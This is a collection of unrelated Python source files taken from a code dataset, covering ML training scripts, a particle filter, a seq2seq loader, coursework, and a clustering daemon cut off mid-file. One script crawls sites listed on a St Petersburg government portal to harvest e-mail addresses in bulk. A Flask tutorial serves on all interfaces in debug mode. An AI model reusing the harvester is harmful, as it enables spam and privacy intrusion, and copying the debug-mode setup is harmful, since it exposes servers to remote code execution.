validation_steps=validation_step,\r\n verbose=2,\r\n callbacks=callbacks_list)\r\n\r\n # save model\r\n print('Saving model...')\r\n print('saving %s' % h5_path)\r\n\r\n K.clear_session()\r\n\r\n # convert model to pb format\r\n pb_path = os.path.join(model_path, model_name + '.pb')\r\n print('saving %s' % pb_path)\r\n convert(h5_path, pb_path)\r\n time.sleep(0.5)\r\n\r\n # convert model to openvino IR format\r\n # ir_cmd = \"python /opt/intel/openvino/deployment_tools/model_optimizer/mo_tf.py --input_model %s \" \\\r\n # \"--data_type FP32 --output_dir %s --input_shape [1,%d,%d,3] --silent\" \\\r\n # % (pb_path, model_path, image_size, image_size)\r\n # print(ir_cmd)\r\n # os.system(ir_cmd)\r\n print('Model saved.')\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main() or 0)\r\n","sub_path":"training_backhand/utils/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511415041","text":"from flask import Flask\napp = Flask(__name__)\n\n# Import modules for CRUD operations from lesson-1\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\n# Create session and connect to DB\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n@app.route('/')\n@app.route('/hello')\ndef HelloWorld():\n restaurant = session.query(Restaurant).filter_by(id = '2')\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant[0].id)\n output = ''\n for item in items:\n output += item.name\n output += '
'\n output += item.price\n output += '
'\n output += item.description\n output += '

'\n return output\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/3_restaurant/Lesson-3/3_Listing-Menu-Items-with-Flask/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"3555537","text":"# Librerias\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n# Importo el dataset\ndataset = pd.read_csv('./ejercicios/regresion-lineal-polinomica/Position_Salaries.csv')\nx = dataset.iloc[:, 1:-1].values\ny = dataset.iloc[:, -1].values\n\n# Ajustar mi dataset con las nuevas columnas polinomicas\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree=4)\nx_poly = poly_reg.fit_transform(x)\n\n# Crear el modelo de regresion lineal\nfrom sklearn.linear_model import LinearRegression\nregresion = LinearRegression()\nregresion.fit(x_poly, y)\n\n# Predecir el conjunto de testing\ny_predic = regresion.predict(x_poly)\n\n# Graficar los resultados\nplt.scatter(x, y, color=\"red\")\nplt.plot(x, y_predic, color=\"blue\")\nplt.title(\"Sueldo vs Nivel\")\nplt.xlabel(\"Nivel\")\nplt.ylabel(\"Sueldo $\")\nplt.show()\n","sub_path":"ejercicios/regresion-polinomica/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"472964530","text":"# coding: utf8\nimport inspect\nimport os\nimport sys\n\nfrom sklearn.base import BaseEstimator, RegressorMixin\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import KNeighborsRegressor\n\n# Full path\nsys.path.insert(0, '../../sdr_toolbox/')\n\nfrom sdr_toolbox.sdr_estimators.sir import sir\n\n\n\n\n\nclass SIRKnn(BaseEstimator, RegressorMixin):\n \"\"\"\n Implementing SIR for dimension reduction + kNN on reduced features as\n regressor.\n \"\"\"\n\n def __init__(self, n_neighbors = 1, n_components = 1,\n n_levelsets = 1, n_jobs = 1, rescale = True):\n \"\"\"\n\n \"\"\"\n # Set attributes of object to the same name as given in the argument\n # list.\n args, _, _, values = inspect.getargvalues(inspect.currentframe())\n values.pop(\"self\")\n\n for arg, val in values.items():\n setattr(self, arg, val)\n\n\n def fit(self, X, y=None):\n \"\"\"\n \"\"\"\n if self.n_components > self.n_levelsets:\n raise RuntimeError(\"n_components = {0} > {1} = n_levelsets\".format(self.n_components, self.n_levelsets))\n n_samples, n_features = X.shape\n self.SIR_space_ = sir(X.T, y, d = self.n_components,\n n_levelsets = self.n_levelsets,\n rescale = self.rescale)\n self.XT_ = (self.SIR_space_.T.dot(X.T)).T\n self.knn_ = KNeighborsRegressor(n_neighbors = self.n_neighbors,\n n_jobs = self.n_jobs)\n self.knn_ = self.knn_.fit(self.XT_, y)\n return self\n\n\n def predict(self, X, y=None):\n try:\n getattr(self, \"knn_\")\n except AttributeError:\n raise RuntimeError(\"You must train estimator before predicting data!\")\n\n return self.knn_.predict(self.SIR_space_.T.dot(X.T).T)\n","sub_path":"estimators/SIRKnn.py","file_name":"SIRKnn.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47526066","text":"import pytorch_lightning as pl\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.functional as F\nimport util\nfrom argparse import ArgumentParser\n\n\nclass ExampleModel(pl.LightningModule):\n def __init__(self, hparams):\n super().__init__()\n self.hparams = hparams\n self.hparams[\"tpu_cores\"] = 0\n self.loss = self.get_loss_fn()\n # you can get fancier here of course, we will likely have a separate\n # class for the model\n self.model = nn.Sequential(\n nn.Linear(40, 128),\n nn.ReLU(),\n nn.Linear(128, 256),\n nn.ReLU(),\n nn.Linear(256, self.hparams.n_classes),\n )\n\n def forward(self, inputs):\n # defines what happens at inference times\n logits = self.model(inputs)\n probs = (\n torch.sigmoid(logits)\n if self.hparams.n_classes == 1\n else nn.Softmax(-1)(logits)\n )\n return probs\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self.model(x)\n loss = self.loss(logits, y)\n self.log(\"train_loss\", loss)\n # see the arguments to self.log\n # https://pytorch-lightning.readthedocs.io/en/stable/new-project.html#logging\n return loss\n\n def training_epoch_end(self, training_step_outputs):\n example = []\n for loss in training_step_outputs:\n example.append(loss.detach().cpu().item())\n training_epoch_loss = sum(example) / len(example)\n self.log(\n \"train_epoch_loss\",\n training_epoch_loss,\n logger=True,\n on_step=True,\n prog_bar=True,\n )\n return training_epoch_loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self.model(x)\n loss = self.loss(logits, y)\n self.log(\"validation_loss\", loss, logger=True)\n # do more things to evaluate intuitive metrics\n\n def validation_epoch_end(self, valid_step_outputs):\n for loss in valid_step_outputs:\n example.append(loss.detach().cpu().item())\n val_loss = sum(example) / len(example)\n self.log(\"val_epoch_loss\", val_loss, logger=True)\n # perhaps log some sort of visualization of a transformation on the data\n # or something, you can do anything you want\n return val_loss\n\n def get_loss_fn(self):\n # you can either get the loss function from args or by hand\n loss = (\n nn.BCEWithLogitsLoss()\n if self.hparams.n_classes == 1\n else nn.CrossEntropyLoss()\n )\n return loss\n\n def configure_optimizers(self):\n if self.hparams.optimizers == \"Adam\":\n optim = torch.optim.Adam(self.model.parameters(), lr=self.hparams.lr)\n else:\n optim = torch.optim.SGD(\n self.model.parameters(),\n lr=self.hparams.lr,\n momentum=self.hparams.momentum,\n )\n\n # test this\n return util.set_schedule(self, optim)\n\n def __dataloader(self, split):\n # write this\n pass\n\n def val_dataloader(self):\n return self.__dataloader(\"valid\")\n\n def train_dataloader(self):\n return self.__dataloader(\"train\")\n\n def test_dataloader(self):\n return self.__dataloader(\"test\")\n\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument(\"--n_classes\", type=int, default=1)\n","sub_path":"lightning/example_lightning.py","file_name":"example_lightning.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8455359","text":"# 2805 / calculate profit of harvested crops in rhombus\nfor T in range(int(input())):\n N = int(input())\n mat = [list(map(int, input())) for i in range(N)]\n\n mid, res = N // 2, 0\n for i in range(N):\n if i < mid: # row which is before mid, extend range\n res += sum(mat[i][mid - i:mid + i + 1])\n else: # row which is after mid, reduce range\n res += sum(mat[i][mid - (N - i - 1):mid + (N - i)])\n\n print(f'#{T + 1} {res}')\n ","sub_path":"D3/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403970695","text":"import sys\n\nd_trig = False\nf_trig = False\no_trig = False\n\ni_trig = False\n\nfile_name = ''\npath = ''\noutfile_name = ''\n\ndef consist_list(file):\n f = open(file, \"r\")\n data = f.read()\n f.close()\n\n data = data.split('\\n')[:-1]\n if d_trig:\n print(data)\n return data\n\nif __name__ == \"__main__\":\n for i in sys.argv:\n if i == '-d':\n d_trig = True\n elif i == '-p':\n f_trig = True\n elif f_trig == True:\n file_name = i\n f_trig = False\n elif i == '-o':\n o_trig = True\n elif o_trig == True:\n outfile_name = i\n o_trig = False\n elif i == '-i':\n i_trig = True\n\n if len(file_name) == 0:\n print('Enter the Path list file name behind -p.')\n exit(-1)\n\n contents = consist_list(file_name)\n\n if i_trig == True:\n out_file = open(outfile_name.split('.')[0] + '_ID.txt', \"w\")\n for file in contents:\n f = open(file + '.txt', \"r\")\n for line in f:\n out_file.write(line[:-1] + ' ' + file + '\\n')\n else:\n out_file = open(outfile_name, \"w\")\n for file in contents:\n f = open(file + '.txt', \"r\")\n for line in f:\n out_file.write(line[:-1] + '\\n')\n f.close()\n out_file.close()\n","sub_path":"src/gps/pure_pursuit/paths/detail_map/centerLine/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"401012653","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport threading\neMails = []\nurls = []\nlast_urls =[]\ndef findEmail(url, TTL, mainUrl):\n eMail = ''\n try:\n #Сразу отсеим ссылки на документы pdf\n if url.find(\"pdf\") < 0:\n # Загрузаем страницу сайта\n page = urlopen(url)\n except Exception:\n return eMail\n #Парсим полученную страницу\n soup = BeautifulSoup(page, 'html.parser')\n #Получаем все теги-ссылки\n page_urls = soup.findAll('a')\n \n #Обрабатываем полученные ссылки\n for element in page_urls:\n #Если тег не пустой\n if element.string != None:\n #Если в тексте тега содержится символ Собака\n if element.string.find('@')>=0:\n # Мы нашли e-mail, возвращаем его\n eMail = element.string\n return eMail\n else: \n # Если время жизни паука еще не кончилось\n if TTL > 0:\n try:\n #Проверяем, что ссылка на страницу и еще не была посещена и находится в пределах обыскиваемого сайта\n if element['href'].find(mainUrl) >= 0 and last_urls.count(element['href'])<1:\n #Добавляем ссылку в посещенные\n last_urls.append(element['href'])\n #Пробуем получить e-mail с этой страницы, уменьшив время жизни\n eMail_1 = findEmail(element['href'], TTL-1,mainUrl)\n #Если получили в результате адрес почты\n if eMail_1.find('@')>=0:\n return eMail_1\n except Exception:\n eMail_1 = ''\n \n return eMail\n\n#Фукция-обертка для удобного запуска потока\ndef startFinder(url, TTL, mainUrl):\n #Отчитываемся о том, что запустили поток\n print(\"thread \" + mainUrl + \" start \\n\")\n #Ищем адреса на сайте (mainUrl нужен для того, чтобы оставаться в пределах сайта)\n eM = findEmail(url, TTL,mainUrl)\n #Добавляем в список\n eMails.append(eM)\n\nevents = []\ni = 1\nwhile i<=26: #На сайте 26 страниц с полезной иформацией\n # Загружаем страницу\n page = urlopen(\"https://esir.gov.spb.ru/category/21/?page=\"+str(i)) \n \n #Парсим страницу с помощью BeautifulSoup\n soup = BeautifulSoup(page, 'html.parser')\n \n #Получаем со страницы все теги с классом small\n urls_tag = soup.findAll(attrs={\"class\":\"small\"})\n \n #Добавляем адреса сайтов в список и запусткаем обработку полученного полученного сайта в отдельном потоке\n for element in urls_tag:\n urls.append(element.string)\n events.append(threading.Thread(target=startFinder,args=('http://' + element.string, 3,element.string)))\n #Запускаем поток\n events[-1].start() \n i=i+1\ni = 1\nwhile i<=5:\n page = urlopen(\"https://esir.gov.spb.ru/category/22/?page=\"+str(i))\n soup = BeautifulSoup(page, 'html.parser')\n urls_tag = soup.findAll(attrs={\"class\":\"small\"})\n for element in urls_tag:\n urls.append(element.string)\n events.append(threading.Thread(target=startFinder,args=('http://' + element.string, 3,element.string)))\n events[-1].start()\n i=i+1 \n#Завершаем потоки\nfor e in events:\n e.join()\n#Открываем файл на запись (Если файла нет, он создастся автоматически)\nf = open( 'emails.txt', 'w' )\n\n#Записываем по очереди на отдельные строки все элементы полученного списка\nfor item in eMails:\n #Если длинна больше трех (убираем пустые строки с сайтов, где не было найдено e-mail)\n if len(item) > 3:\n print(item)\n f.write(\"%s\\n\" % item)\n#Закрываем файл\nf.close()\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541249413","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport time\n\n#这里修改准备预处理的文件的名字\nfilename = './10_10_10_65_9000_optimizer_2015-10-19.log'\n\n\n#下面11个是想要获取的城市名称(输出的文件名也是他们)\ncity1 = '中国_安徽_合肥'\ncity2 = '中国_江西_南昌'\ncity3 = '中国_河南_郑州'\ncity4 = '中国_湖南_��沙'\ncity5 = '中国_海南_海口'\ncity6 = '中国_贵州_贵阳'\ncity7 = '中国_陕西_西安'\ncity8 = '中国_青海_西宁'\ncity9 = '中国_内蒙古_呼和浩特'\ncity10 = '中国_西藏_拉萨'\ncity11 = '中国_新疆_乌鲁木齐'\n\n\ndef wrete_content(filename, content):\n\twith open(filename, 'a+', encoding= 'utf-8') as f1:\n\t\tf1.write(content)\n\nstart = time.time()\nwith open(filename, 'r', encoding= 'utf-8') as f:\n\tfor line in f:\n\t\ttry:\n\t\t\tobj = json.loads(line)\t\n\t\t\tcityname = obj['city']\n\t\t\tif(cityname == city1):\n\t\t\t\twrete_content(city1,line)\n\t\t\tif(cityname == city2):\n\t\t\t\twrete_content(city2,line)\n\t\t\tif(cityname == city3):\n\t\t\t\twrete_content(city3,line)\n\t\t\tif(cityname == city4):\n\t\t\t\twrete_content(city4,line)\n\t\t\tif(cityname == city5):\n\t\t\t\twrete_content(city5,line)\n\t\t\tif(cityname == city6):\n\t\t\t\twrete_content(city6,line)\n\t\t\tif(cityname == city7):\n\t\t\t\twrete_content(city7,line)\n\t\t\tif(cityname == city8):\n\t\t\t\twrete_content(city8,line)\n\t\t\tif(cityname == city9):\n\t\t\t\twrete_content(city9,line)\n\t\t\tif(cityname == city10):\n\t\t\t\twrete_content(city10,line)\n\t\t\tif(cityname == city11):\n\t\t\t\twrete_content(city11,line)\t\t\t\n\t\texcept:\n\t\t\tcontinue\nend = time.time()\t\ntotal = end - start\nminutes = total//60\nseconds = total%60\nprint('一共耗时: ' + str(minutes) +' 分 ' + str(seconds) + '秒\\n')\n\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"267574583","text":"import numpy as np\nimport collections \nimport ipdb\n\n\n\nclass pf_distributions:\n\n def __init__(self,sample_particles,log_inc_weight,sample_particles_initial,log_inc_weight_initial):\n # test that the methods passed are callable\n assert callable(sample_particles)\n assert callable(log_inc_weight)\n assert callable(sample_particles_initial)\n assert callable(log_inc_weight_initial)\n\n # add methods to object\n self.sample_particles_initial = sample_particles_initial\n self.sample_particles = sample_particles\n self.log_inc_weight_initial = log_inc_weight_initial\n self.log_inc_weight = log_inc_weight\n\n\n\nclass pf_params:\n\n def __init__(self,muparams,fparams,gparams):\n assert isinstance(muparams,dict)\n assert isinstance(fparams,dict)\n assert isinstance(gparams,dict)\n self.muparams = muparams\n self.fparams = fparams\n self.gparams = gparams\n\ndef get_pf_settings(likelihood_only,rel_var_est=False,ess_threshold=np.Inf,occasional_obs=False,propagation_freq=1,systematic_resampling=False):\n pf_settings = {'rel_var_est':rel_var_est,\n 'likelihood_only':likelihood_only,\n 'ess_threshold':ess_threshold,\n 'occasional_obs':occasional_obs,\n 'propagation_freq':propagation_freq,\n 'systematic_resampling':systematic_resampling}\n return pf_settings\n\n\ndef pf(Y,N,params,distributions,pf_settings):\n '''\n perform pf inference, returning particles, noise, weights and ancestory\n '''\n\n rel_var_est = pf_settings['rel_var_est']\n likelihood_only = pf_settings['likelihood_only']\n systematic_resampling = pf_settings['systematic_resampling']\n ess_threshold = pf_settings['ess_threshold']\n occasional_obs = pf_settings['occasional_obs']\n propagation_freq = pf_settings['propagation_freq']\n\n if systematic_resampling:\n from cython.resampling import systematic_resampling\n resampling_method = systematic_resampling\n else:\n resampling_method = choice_resampling\n\n # define local params and distributions\n sample_particles = distributions.sample_particles\n sample_particles_initial = distributions.sample_particles_initial\n log_inc_weight = distributions.log_inc_weight\n log_inc_weight_initial = distributions.log_inc_weight_initial\n\n\n # initialise arrays\n n,D = Y.shape\n log_Z = np.zeros(n)\n \n # initial sampling, weighting and resampling\n Xt,eps0 = sample_particles_initial(N,Y[0,],params)\n _,Dx = Xt.shape\n\n # initialise larger arrays if needing more than likelihood evaluations\n if not likelihood_only:\n A = np.empty((n,N),dtype=int)\n log_w = np.empty((n,N))\n W = np.empty_like(log_w)\n if occasional_obs:\n X = np.empty((n,propagation_freq,N,Dx))\n eps = np.empty((n,propagation_freq,N,Dx))\n else:\n X = np.empty((n,N,Dx))\n eps = np.empty((n,N,Dx))\n \n # optionally estimate relative variance\n if rel_var_est:\n V_collect = np.zeros(n)\n E = np.arange(N)\n V_collect[0] = 0\n\n # initial likelihood calculation\n log_w0 = log_inc_weight_initial(Xt,Y[0,],params)\n log_Zt,Wt = process_pf_weights(log_w0,-np.log(N)*np.ones(N))\n log_Z[0] = log_Zt\n\n # resample depending on ess\n At,log_W_tm1 = resample_particles(Wt,ess_threshold,resampling_method,N)\n\n # need to reshape so its a format ready for propagation at the first pf iteration\n if occasional_obs:\n Xt = Xt.reshape((1,N,Dx))\n eps0 = eps0.reshape((1,N,Dx))\n\n # optionally store initial values\n if not likelihood_only:\n X[0,] = Xt\n eps[0,] = eps0\n log_w[0,] = log_w0\n W[0,] = Wt\n A[0,] = At\n\n # iterate through time\n for t in range(1,n):\n\n # optionally estimate relative variance\n if rel_var_est:\n E = E[At]\n psi,_=np.histogram(E,np.arange(N))\n mstar = (N/(float(N)-1))**t * (1-np.sum((psi/float(N))**2)) * (N**2/float(N*(N-1)))\n V_collect[t] = 1-mstar\n\n # sample particles\n if not occasional_obs:\n Xt,epst = sample_particles(Xt[At,],Y[t,],params)\n log_wt = log_inc_weight(Xt,Y[t,],params)\n else:\n Xt,epst = sample_particles(Xt[-1,At,],Y[t,],params,propagation_freq)\n log_wt = log_inc_weight(Xt[-1,],Y[t,],params)\n\n # evaluate weights\n log_Zt,Wt = process_pf_weights(log_wt,log_W_tm1)\n log_Z[t] = log_Zt\n\n # resample\n At,log_W_tm1 = resample_particles(Wt,ess_threshold,resampling_method,N)\n\n # optionally store initial values\n if not likelihood_only:\n X[t,] = Xt\n eps[t,] = epst\n log_w[t,] = log_wt\n W[t,] = Wt\n A[t,] = At\n\n # return results depending on settings\n if likelihood_only and rel_var_est:\n return log_Z,V_collect\n elif likelihood_only and not rel_var_est:\n return log_Z\n elif not likelihood_only and rel_var_est:\n return log_Z,X,W,log_w,eps,A,V_collect\n elif not likelihood_only and not rel_var_est:\n return log_Z,X,W,log_w,eps,A\n \n\n\n \ndef resample_particles(Wt,ess_threshold,resampling_method,N):\n '''\n resample particles depending on ess\n '''\n ESS = 1./np.sum(Wt**2)\n log_W_tm1 = np.zeros(N)\n if ESS/N0.):\n At = resampling_method(Wt)\n log_W_tm1 = np.log(N**-1)\n else:\n At = range(N)\n log_W_tm1[~np.isclose(Wt,0)] = np.log(Wt[~np.isclose(Wt,0)]) \n log_W_tm1[np.isclose(Wt,0)] = -np.inf\n\n return At,log_W_tm1 \n\n\ndef process_pf_weights(log_w,log_W_tm1):\n '''\n return conditional likelihood and normalised weights\n '''\n \n log_weighted_inc = log_w + log_W_tm1\n maxlog_w = np.max(log_weighted_inc)\n Wscaled = np.exp(log_weighted_inc-maxlog_w)\n sum_Wscaled = np.sum(Wscaled)\n log_Zt = np.log(sum_Wscaled)+maxlog_w\n Wnormalised = Wscaled/sum_Wscaled\n return log_Zt,Wnormalised\n\n\ndef choice_resampling(W):\n '''\n simple wrapper for multinomial resampling\n '''\n assert W.ndim==1\n N = W.shape[0]\n return np.random.choice(range(N),N,p=W,replace=True)\n\n\n\n\n\n","sub_path":"pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"436029312","text":"\"\"\" Optional problems for Lab 3 \"\"\"\n\ndef is_prime(n):\n \"\"\"Returns True if n is a prime number and False otherwise.\n\n >>> is_prime(2)\n True\n >>> is_prime(16)\n False\n >>> is_prime(521)\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n \"give a positive integer n and m,count from 1 to m ,the number can be divided by n\"\n def countzero(n,m):\n assert n >0 and m> 0 ,\"n,m are positive\"\n inc=0\n if m==1:\n return 1\n if n%m==0:\n inc=1\n return inc+countzero(n,m-1)\n if countzero(n,n) ==2:\n return True\n return False\n\ndef gcd(a, b):\n \"\"\"Returns the greatest common divisor of a and b.\n Should be implemented using recursion.\n\n >>> gcd(34, 19)\n 1\n >>> gcd(39, 91)\n 13\n >>> gcd(20, 30)\n 10\n >>> gcd(40, 40)\n 40\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n if max(a,b)%min(a,b)==0:\n return min(a,b)\n return gcd(min(a,b),max(a,b)%min(a,b))\n\ndef ten_pairs(n):\n \"\"\"Return the number of ten-pairs within positive integer n.\n\n >>> ten_pairs(7823952)\n 3\n >>> ten_pairs(55055)\n 6\n >>> ten_pairs(9641469)\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def countdigits(n,x):\n assert x <10 ,\"x < 10\"\n if n<10:\n if n == x:\n return 1\n return 0\n if n%10 == x:\n return 1+countdigits(n//10,x)\n return countdigits(n//10,x)\n\n if n<=10:\n return 0\n elif n<100:\n if n%10 + n//10 == 10:\n return 1\n if n%10 == 0:\n return ten_pairs(n//10)\n return ten_pairs(n//10)+countdigits(n//10,10-n%10)","sub_path":"lab03/lab03_extra.py","file_name":"lab03_extra.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60805970","text":"from operator import itemgetter\nfrom typing import Dict, List, Tuple\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom constants import PAD, BOS, EOS, UNK\n\n\nclass Seq2seqDataset(Dataset):\n def __init__(self,\n path: str,\n source_word_to_id: Dict[str, int],\n target_word_to_id: Dict[str, int],\n seq_lim:int = 30\n ) -> None:\n self.source_word_to_id = source_word_to_id\n self.target_word_to_id = target_word_to_id\n self.seq_lim = seq_lim\n self.sources, self.targets = self._load(path)\n\n def __len__(self) -> int:\n return len(self.sources)\n\n def __getitem__(self,\n idx: int\n ) -> Tuple[List, List, List, List, List]:\n source = self.sources[idx]\n source_mask = [1] * len(source)\n target = self.targets[idx]\n target_input, target_output = target[0], target[1]\n target_mask = [1] * len(target[0])\n return source, source_mask, target_input, target_output, target_mask\n\n def _load(self,\n path: str,\n delimiter: str = '\\t'\n ) -> Tuple[List, List]:\n sources, targets = [], []\n with open(path) as f:\n for line in f:\n former, latter = line.strip().split(delimiter)\n source_ids: List[int] = []\n for mrph in former.split():\n if mrph in self.source_word_to_id.keys():\n source_ids.append(self.source_word_to_id[mrph])\n else:\n source_ids.append(UNK)\n sources.append(source_ids)\n\n target_inp_ids: List[int] = []\n target_out_ids: List[int] = []\n for mrph in latter.split():\n if mrph in self.target_word_to_id.keys():\n target_inp_ids.append(self.target_word_to_id[mrph])\n target_out_ids.append(self.target_word_to_id[mrph])\n else:\n target_inp_ids.append(UNK)\n target_out_ids.append(UNK)\n if self.seq_lim is not None and len(target_inp_ids) > self.seq_lim:\n target_inp_ids = target_inp_ids[-self.seq_lim:]\n target_out_ids = target_out_ids[-self.seq_lim:]\n target_inp_ids.insert(0, BOS)\n target_out_ids.append(EOS)\n targets.append([target_inp_ids, target_out_ids])\n return sources, targets\n\n\nclass Seq2seqDataLoader(DataLoader):\n def __init__(self,\n path: str,\n source_word_to_id: Dict[str, int],\n target_word_to_id: Dict[str, int],\n batch_size: int,\n shuffle: bool,\n num_workers: int\n ) -> None:\n self.dataset = Seq2seqDataset(path, source_word_to_id, target_word_to_id)\n self.n_samples = len(self.dataset)\n super(Seq2seqDataLoader, self).__init__(self.dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=seq2seq_collate_fn)\n\n\ndef seq2seq_collate_fn(batch: List[Tuple]\n ) -> Tuple[torch.LongTensor, torch.LongTensor,\n torch.LongTensor, torch.LongTensor, torch.LongTensor]:\n sources, source_masks, target_inputs, target_outputs, target_masks = [], [], [], [], []\n cache = [(len(sample[0]), len(sample[2])) for sample in batch]\n max_source_length = max(cache, key=itemgetter(0))[0]\n max_target_length = max(cache, key=itemgetter(1))[1]\n for sample in batch:\n source, source_mask, target_input, target_output, target_mask = sample\n source_length, target_length = len(source), len(target_input)\n\n source_padding = [PAD] * (max_source_length - source_length)\n sources.append(source + source_padding)\n source_mask_padding = [0] * (max_source_length - source_length)\n source_masks.append(source_mask + source_mask_padding)\n\n target_padding = [PAD] * (max_target_length - target_length)\n target_inputs.append(target_input+target_padding)\n target_outputs.append(target_output+target_padding)\n target_mask_padding = [0] * (max_target_length - target_length)\n target_masks.append(target_mask + target_mask_padding)\n return torch.LongTensor(sources), torch.LongTensor(source_masks), \\\n torch.LongTensor(target_inputs), torch.LongTensor(target_outputs), torch.LongTensor(target_masks)\n","sub_path":"src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"429998911","text":"from clustering.gsdpmm.gsdpmm_stream_ifd_dynamic import GSDPMMStreamIFDDynamic\nfrom utils.multiprocess_utils import CustomDaemonProcess\nimport multiprocessing as mp\n\n\nclass ClusterDaemonProcess(CustomDaemonProcess):\n def __init__(self, pidx=0):\n CustomDaemonProcess.__init__(self, pidx)\n self.outq2 = mp.Queue()\n \n def start(self, func):\n self.process = mp.Process(target=func, args=(self.inq, self.outq, self.outq2))\n self.process.daemon = True\n self.process.start()\n\n\nEND_PROCESS = -1\nINPUT_TWARR = 0\nSET_PARAMS = 1\ncluster_daemon = ClusterDaemonProcess()\n\n\ndef clustering(inq, outq, outq_list):\n clusterer = BackCluster()\n while True:\n command = inq.get()\n if command == INPUT_TWARR:\n tw_batch = inq.get()\n clusterer.input_twarr(tw_batch, outq_list)\n elif command == SET_PARAMS:\n params = inq.get()\n clusterer.set_parameters(*params)\n elif command == END_PROCESS:\n outq.put('ending')\n return\n else:\n print('no such command')\n\n\ndef send_simple_message(command, arg, receive):\n cluster_daemon.set_input(command)\n if arg:\n cluster_daemon.set_input(arg)\n if receive:\n return cluster_daemon.get_output()\n\n\ndef start_pool(hold_batch_num, batch_size, alpha, beta):\n cluster_daemon.start(clustering)\n send_simple_message(SET_PARAMS, arg=(hold_batch_num, batch_size, alpha, beta), receive=False)\n\n\ndef wait():\n send_simple_message(END_PROCESS, arg=None, receive=True)\n cluster_daemon.end()\n\n\ndef input_twarr_batch(tw_batch):\n if tw_batch:\n send_simple_message(INPUT_TWARR, arg=tw_batch, receive=False)\n\n\ndef wait_until_get_cluid_twarr_list():\n return cluster_daemon.outq2.get()\n\n\ndef try_get_cluid_twarr_list():\n cluid_twarr_list = None\n while cluster_daemon.outq2.qsize() > 0:\n cluid_twarr_list = wait_until_get_cluid_twarr_list()\n return cluid_twarr_list\n\n\nclass BackCluster:\n def __init__(self):\n self.read_batch_num = self.hist_len = 0\n self.hold_batch_num = self.batch_size = None\n self.gsdpmm = GSDPMMStreamIFDDynamic()\n self.tweet_pool = list()\n \n def set_parameters(self, hold_batch_num, batch_size, alpha, beta):\n self.hold_batch_num, self.batch_size = hold_batch_num, batch_size\n self.gsdpmm.set_hyperparams(alpha, beta)\n \n def input_twarr(self, twarr, out_channel):\n twarr = self.gsdpmm.filter_dup_id(twarr)\n self.tweet_pool.extend(twarr)\n n = len(twarr)\n self.hist_len += n\n print(' -> new {} tw, current pool: {}, hist len: {}'.format(n, len(self.tweet_pool), self.hist_len))\n while len(self.tweet_pool) >= self.batch_size:\n self.input_batch(self.tweet_pool[:self.batch_size])\n self.tweet_pool = self.tweet_pool[self.batch_size:]\n self.output(out_channel)\n \n def input_batch(self, tw_batch):\n self.read_batch_num += 1\n print(' - read batch num: {}'.format(self.read_batch_num))\n params = [\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_STORE, iter_num=None),\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_FULL, iter_num=25),\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_SAMPLE, iter_num=3)\n ]\n hbn, rbn, = self.hold_batch_num, self.read_batch_num\n param = params[0 if rbn < hbn else 1 if rbn == hbn else 2]\n self.gsdpmm.input_batch(**param)\n \n def output(self, out_channel):\n hbn, rbn = self.hold_batch_num, 